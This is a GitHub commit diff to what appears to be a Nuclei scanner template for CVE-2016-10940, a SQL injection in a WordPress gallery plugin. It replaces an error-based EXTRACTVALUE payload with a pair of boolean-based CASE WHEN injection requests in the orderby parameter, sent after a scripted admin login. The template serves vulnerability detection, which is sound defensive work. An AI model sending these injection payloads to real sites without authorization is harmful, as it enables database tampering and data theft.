Update CVE-2016-10940.yaml

patch-1
Prince Chaddha 2022-02-05 01:20:21 +05:30 committed by GitHub
parent 3bc20d0d12
commit bbd80d10d4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 11 deletions

View File

@ -28,20 +28,21 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- | - |
GET /wp-admin/admin.php?page=zm_gallery&orderby=name&order=desc%2CEXTRACTVALUE%283991%2CCONCAT%280x5c%2C0x7170707671%2C%28SELECT+%28ELT%283991%3D3991%2C1%29%29%29%2C0x7178717671%29%29 HTTP/1.1 GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
- |
GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
Host: {{Hostname}}
req-condition: true
cookie-reuse: true cookie-reuse: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: dsl
part: body dsl:
words: - 'contains(body_2, "<th scope=\"row\" class=\"check-column\">")'
- "ZM Gallery Plugin"
- "XPATH syntax error"
- "EXTRACTVALUE("
condition: and
- type: status - type: dsl
status: dsl:
- 200 - '!contains(body_3, "<th scope=\"row\" class=\"check-column\">")'